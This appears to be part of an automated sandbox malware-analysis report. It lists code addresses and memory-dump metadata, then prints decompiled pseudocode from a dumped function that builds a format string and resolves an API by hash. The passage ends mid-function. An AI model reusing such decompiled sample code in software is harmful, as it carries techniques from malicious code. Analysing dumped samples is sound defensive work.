0x003c472a
0x003c4a96
0x003c4a98
0x003c4a9c
0x003c4aa0
0x003c4aa6
0x003c4aaa
0x003c4aac
0x003c4bd2
0x003c4ab2
0x003c4ab4
0x003c4ab8
0x003c4aba
0x003c4abc
0x003c4abc
0x003c4ac1
0x003c4ac3
0x003c4ac5
0x003c4aca
0x003c4aca
0x003c4ace
0x003c4ad4
0x003c4ad6
0x003c4ad8
0x003c4add
0x003c4add
0x003c4ae1
0x003c4ae2
0x003c4ae6
0x003c4ae8
0x003c4aea
0x003c4aee
0x003c4aee
0x003c4aee
0x003c4af2
0x003c4af7
0x003c4af9
0x003c4aff
0x003c4b01
0x003c4b03
0x003c4b08
0x003c4b08
0x003c4aff
0x003c4af7
0x003c4730
0x003c4730
0x003c4736
0x003c4738
0x003c473d
0x003c479a
0x003c479a
0x003c473f
0x003c4741
0x003c4744
0x003c4746
0x003c4bdc
0x003c474c
0x003c474c
0x003c4750
0x003c4752
0x003c4754
0x003c4754
0x003c4759
0x003c475b
0x003c475d
0x003c4762
0x003c4762
0x003c4765
0x003c476b
0x003c476d
0x003c476f
0x003c4774
0x003c4774
0x003c4777
0x003c4778
0x003c477c
0x003c4780
0x003c4780
0x003c4780
0x003c4784
0x003c4789
0x003c478b
0x003c4791
0x003c4793
0x003c4795
0x00000000
0x003c4795
0x003c4791
0x003c4789
0x003c479d
0x003c479f
0x003c47a0
0x003c47a5
0x003c47a8
0x003c47ac
0x003c47b5
0x003c47d6
0x003c47e0
0x003c47e4
0x003c47e7
0x003c47ec
0x003c47ef
0x003c47f3
0x003c47f6
0x003c47fa
0x00000000
0x003c47fc
0x003c47fc
0x003c4800
0x003c4802
0x003c4806
0x003c4806
0x003c4808
0x003c480e
0x003c4810
0x003c4815
0x003c4a74
0x003c4a76
0x003c481b
0x003c481d
0x003c481e
0x003c4826
0x003c4828
0x003c4831
0x003c4835
0x003c483c
0x003c483c
0x003c4842
0x003c4844
0x003c4847
0x003c484b
0x003c4a04
0x003c4a06
0x003c4a0b
0x003c4a0f
0x003c4a12
0x003c4a16
0x003c4a63
0x003c4a18
0x003c4a1c
0x003c4a1e
0x003c4a20
0x003c4a23
0x003c4a27
0x003c4a29
0x003c4a2d
0x003c4a2f
0x003c4a33
0x003c4a35
0x003c4a35
0x003c4a36
0x003c4a3b
0x003c4a41
0x00000000
0x00000000
0x003c4a43
0x003c4a47
0x003c4a4c
0x00000000
0x00000000
0x00000000
0x003c4a4c
0x003c4a4e
0x003c4a52
0x003c4a52
0x003c4a27
0x003c4a56
0x003c4a58
0x003c4a59
0x003c4a5e
0x003c4a5e
0x003c4a69
0x003c4a6b
0x003c485a
0x003c485c
0x003c485f
0x003c4881
0x003c4885
0x003c4891
0x003c4896
0x003c489a
0x003c489e
0x003c48a0
0x003c48a0
0x003c48a5
0x003c48a9
0x003c48af
0x00000000
0x00000000
0x003c48b5
0x003c48ba
0x00000000
0x003c48bc
0x003c48bc
0x003c48c0
0x003c48cc
0x003c48e4
0x003c48e4
0x003c48ce
0x003c48ce
0x003c48d2
0x003c48dc
0x003c48e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c48e2
0x00000000
0x003c48d2
0x003c48cc
0x00000000
0x003c48ba
0x003c4bc0
0x003c4bc5
0x003c4bc9
0x003c4861
0x003c4861
0x003c486b
0x003c486f
0x003c4872
0x003c487c
0x003c487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c487f
0x003c4bb7
0x003c4bb7
0x003c4bb7
0x003c48ec
0x003c48fb
0x003c4900
0x003c4913
0x003c4916
0x003c491a
0x003c491f
0x003c4927
0x003c4927
0x003c4934
0x003c4937
0x003c493b
0x003c493c
0x003c4940
0x003c4945
0x003c4949
0x003c494b
0x003c494e
0x003c4950
0x003c4956
0x003c49bc
0x003c4958
0x003c495a
0x003c495c
0x003c495f
0x003c4963
0x003c4965
0x003c4969
0x003c496b
0x003c496f
0x003c4973
0x003c4977
0x003c4977
0x003c4978
0x003c497d
0x003c4983
0x00000000
0x00000000
0x003c4985
0x003c4989
0x003c498e
0x00000000
0x00000000
0x00000000
0x003c498e
0x003c4990
0x003c4994
0x003c4998
0x003c4998
0x003c4963
0x003c499c
0x003c499e
0x003c49a2
0x003c49a6
0x003c49aa
0x003c49af
0x003c49b3
0x003c49b7
0x003c49b7
0x003c49c3
0x003c49c6
0x003c4902
0x003c4902
0x003c4902
0x003c49ca
0x003c49d2
0x003c49d6
0x003c49da
0x003c49dc
0x003c49e0
0x003c49e0
0x003c49e1
0x003c49e6
0x003c49ec
0x00000000
0x00000000
0x003c49f8
0x00000000
0x003c49fa
0x003c49fa
0x003c49fe
0x003c49fe
0x00000000
0x003c49f8
0x003c4ba6
0x003c4baa
0x003c4bae
0x003c4bae
0x003c49ca
0x003c484b
0x003c4a7d
0x003c4a7d
0x003c4a84
0x003c4a88
0x003c4a90
0x003c4a92
0x00000000
0x003c4a92
0x003c47b7
0x003c47b7
0x003c47b9
0x003c47bd
0x003c47c1
0x003c47c1
0x003c47b5
0x003c472a
0x003c43b7
0x003c4b0c
0x003c4b0e
0x003c4b0f
0x003c4b17
0x003c4b2a
0x003c4b2a
0x00000000

Strings

, xrefs: 003C3EF7

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: bb8a5dc1d0eab4c9368d9c2b29d4653d2f835d64d3f74e0822f13d7f4ef9c75e
Instruction ID: 6b4f0a4b25fce2fa1df156c9d46fd0633999f520003e580e5ecbb90cba4142b1
Opcode Fuzzy Hash: bb8a5dc1d0eab4c9368d9c2b29d4653d2f835d64d3f74e0822f13d7f4ef9c75e
Instruction Fuzzy Hash: FF921575A083428FD726CE28C4A0B2AB7E2BFD5314F198A6DE895DB391D734DD41C782

Uniqueness

Uniqueness Score: -1.00%

Function 003C62F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E003C62F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				unsigned int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E003B1030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E003B10B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E003B1030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					goto L18;
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E003B10B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						goto L29;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E003B10B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						L18:
						_t387 = _t264 & 0x0000000f;
						if(_t387 == 0) {
							L22:
							asm("pxor xmm0, xmm0");
							_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t321 != 0) {
									break;
								}
								_t387 = _t387 + 0x10;
								if(_t387 < _t520) {
									continue;
								} else {
									if(_t520 >= 0x7fffffff) {
										L28:
										_t520 = 0x7fffffff;
										goto L29;
									} else {
										while( *((char*)(_t520 + _t264)) != 0) {
											_t520 = _t520 + 1;
											if(_t520 < 0x7fffffff) {
												continue;
											} else {
												goto L28;
											}
											goto L30;
										}
										goto L250;
									}
								}
								goto L30;
							}
							asm("bsf esi, ecx");
							_t520 = _t520 + _t387;
							goto L250;
						} else {
							_t520 = 0;
							_t387 =  ~_t387 + 0x10;
							while( *((char*)(_t520 + _t264)) != 0) {
								_t520 = _t520 + 1;
								if(_t520 < _t387) {
									continue;
								} else {
									goto L22;
								}
								goto L30;
							}
							L250:
							if(_t520 != 0xfffffffe || _t264 == 0) {
								L29:
								_t322 = 0x40;
							} else {
								 *_t264 = 0;
								_t322 = _v40;
							}
							goto L30;
							L124:
							 *((char*)(_t269 + _t523)) = 0x64;
							_t417 = _v44;
							 *((char*)(_t523 + _t417 + 1)) = 0;
							if(_a4 == 0) {
								_v32 = _t496;
								_t497 = _v44;
								_v36 = _t497;
								_push(0x200);
								_t524 = E003B1030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t272 = E003B15C0(0x588ab3ea, 0x8a156a0e);
								if(_t272 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t418 =  *_t308;
										if(_t418 != 0) {
											 *_t418 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E003B1030();
											_t553 = _t553 + 4;
											_t344 =  *_t308;
											if(_t344 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t420 =  *_t344;
													 *_t499 = _t420;
													if(_t420 != 0) {
														_v24 = _t308;
														_t421 = 0;
														while(1) {
															_t421 = _t421 + 1;
															_t278 =  *((char*)(_t344 + _t421 * 2 - 1));
															 *((char*)(_t499 + _t421 * 2 - 1)) = _t278;
															if(_t278 == 0) {
																break;
															}
															_t279 =  *((char*)(_t344 + _t421 * 2));
															 *((char*)(_t499 + _t421 * 2)) = _t279;
															if(_t279 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t344);
												E003B10B0();
												_t553 = _t553 + 8;
											}
											goto L225;
										}
									} else {
										_t346 = _t524 & 0x0000000f;
										if(_t346 == 0) {
											L184:
											asm("pxor xmm0, xmm0");
											_t505 =  ~( ~_t346 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t417 != 0) {
													break;
												}
												_t346 = _t346 + 0x10;
												if(_t346 < _t505) {
													continue;
												} else {
													if(_t505 >= 0x7fffffff) {
														L190:
														_t505 = 0x7fffffff;
													} else {
														while( *((char*)(_t505 + _t524)) != 0) {
															_t505 = _t505 + 1;
															if(_t505 < 0x7fffffff) {
																continue;
															} else {
																goto L190;
															}
															goto L191;
														}
														goto L234;
													}
												}
												goto L191;
											}
											asm("bsf edi, edx");
											_t505 = _t505 + _t346;
											goto L234;
										} else {
											_t505 = 0;
											_t346 =  ~_t346 + 0x10;
											while( *((char*)(_t505 + _t524)) != 0) {
												_t505 = _t505 + 1;
												if(_t505 < _t346) {
													continue;
												} else {
													goto L184;
												}
												goto L191;
											}
											L234:
											if(_t505 == 0xffffffff) {
												_t436 =  *_t308;
												if(_t436 != 0) {
													 *_t436 = 0;
												}
											}
										}
										L191:
										_t216 = _t505 + 1; // 0x80000000
										_t348 =  <=  ? 0x40 : _t216;
										if(_t348 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t348 >> 5 >> 0x1a) + _t348 >> 6;
											_t349 = _t348 & 0x8000003f;
											if(_t349 < 0) {
												_t349 = (_t349 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t352 = _v64 + (0 | _t349 > 0x00000000) << 6;
											_v64 = _t352;
											_push(_t352);
											_t353 = E003B1030();
											_t553 = _t553 + 4;
											_t281 =  *_t308;
											if(_t281 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t432 =  *_t281;
													 *_t353 = _t432;
													if(_t432 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t311 = 0;
														while(1) {
															_t311 = _t311 + 1;
															_t434 =  *((char*)(_t281 + _t311 * 2 - 1));
															 *((char*)(_t353 + _t311 * 2 - 1)) = _t434;
															if(_t434 == 0) {
																break;
															}
															_t435 =  *((char*)(_t281 + _t311 * 2));
															 *((char*)(_t353 + _t311 * 2)) = _t435;
															if(_t435 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t281);
												_v68 = _t353;
												E003B10B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t282 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t431 = 0;
											_t310 = _t282;
											while(1) {
												_t283 =  *_t310;
												_t431 = _t431 + 1;
												 *_t353 = _t283;
												if(_t505 != 0 && _t431 == _t505) {
													goto L228;
												}
												if(_t283 == 0) {
													goto L229;
												} else {
													_t353 = _t353 + 1;
													_t310 = _t310 + 1;
													continue;
												}
												goto L226;
											}
											goto L228;
										}
									}
									goto L226;
								} else {
									_push( &_v32);
									_push(_t497);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t272;
								}
							} else {
								_v52 = _t496;
								_t438 = _a4;
								_t506 = _v44;
								_v56 = _t438;
								_v60 = _t506;
								_push(0x200);
								_t524 = E003B1030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t287 = E003B15C0(0x588ab3ea, 0x8a156a0e);
								if(_t287 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t439 =  *_t308;
										if(_t439 != 0) {
											 *_t439 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E003B1030();
											_t553 = _t553 + 4;
											_t357 =  *_t308;
											if(_t357 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t440 =  *_t357;
													 *_t499 = _t440;
													if(_t440 != 0) {
														_v24 = _t308;
														_t441 = 0;
														while(1) {
															_t441 = _t441 + 1;
															_t290 =  *((char*)(_t357 + _t441 * 2 - 1));
															 *((char*)(_t499 + _t441 * 2 - 1)) = _t290;
															if(_t290 == 0) {
																break;
															}
															_t291 =  *((char*)(_t357 + _t441 * 2));
															 *((char*)(_t499 + _t441 * 2)) = _t291;
															if(_t291 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t357);
												E003B10B0();
												_t553 = _t553 + 8;
											}
											L225:
											 *_t308 = _t499;
											 *((intOrPtr*)(_t308 + 4)) = 0x40;
										}
									} else {
										_t359 = _t524 & 0x0000000f;
										if(_t359 == 0) {
											L134:
											asm("pxor xmm0, xmm0");
											_t512 =  ~( ~_t359 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t438 != 0) {
													break;
												}
												_t359 = _t359 + 0x10;
												if(_t359 < _t512) {
													continue;
												} else {
													if(_t512 >= 0x7fffffff) {
														L140:
														_t512 = 0x7fffffff;
													} else {
														while( *((char*)(_t512 + _t524)) != 0) {
															_t512 = _t512 + 1;
															if(_t512 < 0x7fffffff) {
																continue;
															} else {
																goto L140;
															}
															goto L141;
														}
														goto L230;
													}
												}
												goto L141;
											}
											asm("bsf edi, edx");
											_t512 = _t512 + _t359;
											goto L230;
										} else {
											_t512 = 0;
											_t359 =  ~_t359 + 0x10;
											while( *((char*)(_t512 + _t524)) != 0) {
												_t512 = _t512 + 1;
												if(_t512 < _t359) {
													continue;
												} else {
													goto L134;
												}
												goto L141;
											}
											L230:
											if(_t512 == 0xffffffff) {
												_t456 =  *_t308;
												if(_t456 != 0) {
													 *_t456 = 0;
												}
											}
										}
										L141:
										_t171 = _t512 + 1; // 0x80000000
										_t361 =  <=  ? 0x40 : _t171;
										if(_t361 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t361 >> 5 >> 0x1a) + _t361 >> 6;
											_t362 = _t361 & 0x8000003f;
											if(_t362 < 0) {
												_t362 = (_t362 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t365 = _v64 + (0 | _t362 > 0x00000000) << 6;
											_v64 = _t365;
											_push(_t365);
											_t353 = E003B1030();
											_t553 = _t553 + 4;
											_t293 =  *_t308;
											if(_t293 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t452 =  *_t293;
													 *_t353 = _t452;
													if(_t452 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t314 = 0;
														while(1) {
															_t314 = _t314 + 1;
															_t454 =  *((char*)(_t293 + _t314 * 2 - 1));
															 *((char*)(_t353 + _t314 * 2 - 1)) = _t454;
															if(_t454 == 0) {
																break;
															}
															_t455 =  *((char*)(_t293 + _t314 * 2));
															 *((char*)(_t353 + _t314 * 2)) = _t455;
															if(_t455 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t293);
												_v68 = _t353;
												E003B10B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t294 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t451 = 0;
											_t313 = _t294;
											while(1) {
												_t295 =  *_t313;
												_t451 = _t451 + 1;
												 *_t353 = _t295;
												if(_t512 != 0 && _t451 == _t512) {
													break;
												}
												if(_t295 == 0) {
													L229:
													_t308 = _v24;
												} else {
													_t353 = _t353 + 1;
													_t313 = _t313 + 1;
													continue;
												}
												goto L226;
											}
											L228:
											_t308 = _v24;
											 *((char*)(_t353 + 1)) = 0;
										}
									}
									L226:
									_push(1);
									_push(_t524);
									E003B10B0();
									_push(1);
									_push(_v44);
									E003B10B0();
									_v44 = 0;
									_v40 = 0;
									return _t308;
								} else {
									_push( &_v56);
									_push(_t506);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t287;
								}
							}
						}
					}
				}
				L30:
				_t34 = _t520 + 2; // -2147483660
				_t389 =  <=  ? 0x40 : _t34;
				if(_t322 < _t389) {
					_t327 = (_t389 >> 5 >> 0x1a) + _t389 >> 6;
					_v60 = _t327;
					_t390 = _t389 & 0x8000003f;
					if(_t390 < 0) {
						_t390 = (_t390 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t329 = _t327 + (0 | _t390 > 0x00000000) << 6;
					_v60 = _t329;
					_push(_t329);
					_t266 = E003B1030();
					_t552 = _t552 + 4;
					_t330 = _v44;
					if(_t330 == 0) {
						 *_t266 = 0;
					} else {
						if(_t266 != 0) {
							_t482 =  *_t330;
							 *_t266 = _t482;
							if(_t482 != 0) {
								_v24 = _t306;
								_t318 = 0;
								_v68 = _t496;
								while(1) {
									_t318 = _t318 + 1;
									_t484 =  *((char*)(_t330 + _t318 * 2 - 1));
									 *((char*)(_t266 + _t318 * 2 - 1)) = _t484;
									if(_t484 == 0) {
										break;
									}
									_t485 =  *((char*)(_t330 + _t318 * 2));
									 *((char*)(_t266 + _t318 * 2)) = _t485;
									if(_t485 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t330);
						_v64 = _t266;
						E003B10B0();
						_t266 = _v64;
						_t552 = _t552 + 8;
					}
					_v40 = _v60;
					_v44 = _t266;
				} else {
					_t266 = _v44;
				}
				 *((char*)(_t266 + _t520)) = 0x25;
				 *((char*)(_t520 + _v44 + 1)) = 0;
				if(_a4 != 0) {
					_t395 = _v44;
					if(_t395 == 0) {
						_t521 = 0;
					} else {
						_t381 = _t395 & 0x0000000f;
						if(_t381 == 0) {
							L51:
							asm("pxor xmm0, xmm0");
							_t543 =  ~( ~_t381 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ecx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								if(_t266 != 0) {
									break;
								}
								_t381 = _t381 + 0x10;
								if(_t381 < _t543) {
									continue;
								} else {
									if(_t543 >= 0x7fffffff) {
										L57:
										_t521 = 0x7fffffff;
									} else {
										while( *((char*)(_t543 + _t395)) != 0) {
											_t543 = _t543 + 1;
											if(_t543 < 0x7fffffff) {
												continue;
											} else {
												goto L57;
											}
											goto L58;
										}
										goto L246;
									}
								}
								goto L58;
							}
							asm("bsf esi, eax");
							_t521 = _t543 + _t381;
							goto L246;
						} else {
							_t521 = 0;
							_t381 =  ~_t381 + 0x10;
							while( *((char*)(_t521 + _t395)) != 0) {
								_t521 = _t521 + 1;
								if(_t521 < _t381) {
									continue;
								} else {
									goto L51;
								}
								goto L58;
							}
							L246:
							if(_t521 == 0xfffffffe) {
								 *_t395 = 0;
							}
						}
					}
					L58:
					_t332 =  <=  ? 0x40 : _t521 + 2;
					if(_t332 > _v40) {
						_v60 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
						_t333 = _t332 & 0x8000003f;
						if(_t333 < 0) {
							_t333 = (_t333 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t336 = _v60 + (0 | _t333 > 0x00000000) << 6;
						_v60 = _t336;
						_push(_t336);
						_t267 = E003B1030();
						_t552 = _t552 + 4;
						_t332 = _v44;
						if(_t332 == 0) {
							 *_t267 = 0;
						} else {
							if(_t267 != 0) {
								_t478 =  *_t332;
								 *_t267 = _t478;
								if(_t478 != 0) {
									_v24 = _t306;
									_t317 = 0;
									_v68 = _t496;
									while(1) {
										_t317 = _t317 + 1;
										_t480 =  *((char*)(_t332 + _t317 * 2 - 1));
										 *((char*)(_t267 + _t317 * 2 - 1)) = _t480;
										if(_t480 == 0) {
											break;
										}
										_t481 =  *((char*)(_t332 + _t317 * 2));
										 *((char*)(_t267 + _t317 * 2)) = _t481;
										if(_t481 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
								}
							}
							_push(1);
							_push(_t332);
							_v64 = _t267;
							E003B10B0();
							_t267 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t267;
					} else {
						_t267 = _v44;
					}
					 *((char*)(_t267 + _t521)) = 0x30;
					 *((char*)(_t521 + _v44 + 1)) = 0;
					_t268 = _v44;
					if(_t268 == 0) {
						_t522 = 0;
					} else {
						_t476 = _t268 & 0x0000000f;
						if(_t476 == 0) {
							L77:
							asm("pxor xmm0, xmm0");
							_t537 =  ~( ~_t476 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t332 != 0) {
									break;
								}
								_t476 = _t476 + 0x10;
								if(_t476 < _t537) {
									continue;
								} else {
									if(_t537 >= 0x7fffffff) {
										L83:
										_t522 = 0x7fffffff;
									} else {
										while( *((char*)(_t537 + _t268)) != 0) {
											_t537 = _t537 + 1;
											if(_t537 < 0x7fffffff) {
												continue;
											} else {
												goto L83;
											}
											goto L84;
										}
										goto L242;
									}
								}
								goto L84;
							}
							asm("bsf esi, ecx");
							_t522 = _t537 + _t476;
							goto L242;
						} else {
							_t522 = 0;
							_t476 =  ~_t476 + 0x10;
							while( *((char*)(_t522 + _t268)) != 0) {
								_t522 = _t522 + 1;
								if(_t522 < _t476) {
									continue;
								} else {
									goto L77;
								}
								goto L84;
							}
							L242:
							if(_t522 == 0xfffffffe) {
								 *_t268 = 0;
							}
						}
					}
					L84:
					_t330 = 0x40;
					_t407 =  <=  ? 0x40 : _t522 + 2;
					if(_t407 > _v40) {
						_t375 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
						_v60 = _t375;
						_t465 = _t407 & 0x8000003f;
						if(_t465 < 0) {
							_t465 = (_t465 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t377 = _t375 + (0 | _t465 > 0x00000000) << 6;
						_v60 = _t377;
						_push(_t377);
						_t268 = E003B1030();
						_t552 = _t552 + 4;
						_t330 = _v44;
						if(_t330 == 0) {
							 *_t268 = 0;
						} else {
							if(_t268 != 0) {
								_t469 =  *_t330;
								 *_t268 = _t469;
								if(_t469 != 0) {
									_v24 = _t306;
									_t316 = 0;
									_v68 = _t496;
									while(1) {
										_t316 = _t316 + 1;
										_t471 =  *((char*)(_t330 + _t316 * 2 - 1));
										 *((char*)(_t268 + _t316 * 2 - 1)) = _t471;
										if(_t471 == 0) {
											break;
										}
										_t472 =  *((char*)(_t330 + _t316 * 2));
										 *((char*)(_t268 + _t316 * 2)) = _t472;
										if(_t472 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
									_t330 = _v44;
								}
							}
							_push(1);
							_push(_t330);
							_v64 = _t268;
							E003B10B0();
							_t268 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t268;
					}
					 *((char*)(_t268 + _t522)) = 0x2a;
					 *((char*)(_t268 + _t522 + 1)) = 0;
				} else {
					_t268 = _v44;
				}
				if(_t268 == 0) {
					_t523 = 0;
				} else {
					_t463 = _t268 & 0x0000000f;
					if(_t463 == 0) {
						L103:
						asm("pxor xmm0, xmm0");
						_t531 =  ~( ~_t463 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [eax+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb ecx, xmm1");
							if(_t330 != 0) {
								break;
							}
							_t463 = _t463 + 0x10;
							if(_t463 < _t531) {
								continue;
							} else {
								if(_t531 >= 0x7fffffff) {
									L109:
									_t523 = 0x7fffffff;
								} else {
									while( *((char*)(_t531 + _t268)) != 0) {
										_t531 = _t531 + 1;
										if(_t531 < 0x7fffffff) {
											continue;
										} else {
											goto L109;
										}
										goto L110;
									}
									goto L238;
								}
							}
							goto L110;
						}
						asm("bsf esi, ecx");
						_t523 = _t531 + _t463;
						goto L238;
					} else {
						_t523 = 0;
						_t463 =  ~_t463 + 0x10;
						while( *((char*)(_t523 + _t268)) != 0) {
							_t523 = _t523 + 1;
							if(_t523 < _t463) {
								continue;
							} else {
								goto L103;
							}
							goto L110;
						}
						L238:
						if(_t523 == 0xfffffffe) {
							 *_t268 = 0;
						}
					}
				}
				L110:
				_t338 =  <=  ? 0x40 : _t523 + 2;
				if(_t338 > _v40) {
